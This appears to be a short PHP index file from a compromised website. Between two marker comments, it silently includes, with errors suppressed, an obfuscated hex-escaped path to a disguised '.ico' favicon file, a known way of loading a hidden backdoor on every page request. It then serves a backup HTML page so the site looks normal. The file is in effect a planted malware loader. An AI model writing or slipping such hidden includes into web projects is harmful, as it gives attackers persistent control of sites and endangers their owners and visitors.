<?php

/*7efba*/

@include "\x2fho\x6de/\x73it\x654d\x65m/\x70ub\x6cic\x5fht\x6dl/\x42OD\x59FO\x43US\x2fta\x67/i\x6eje\x63ta\x62le\x73/f\x61vi\x63on\x5f21\x3083\x37.i\x63o";

/*7efba*/


echo file_get_contents('index.html.bak.bak');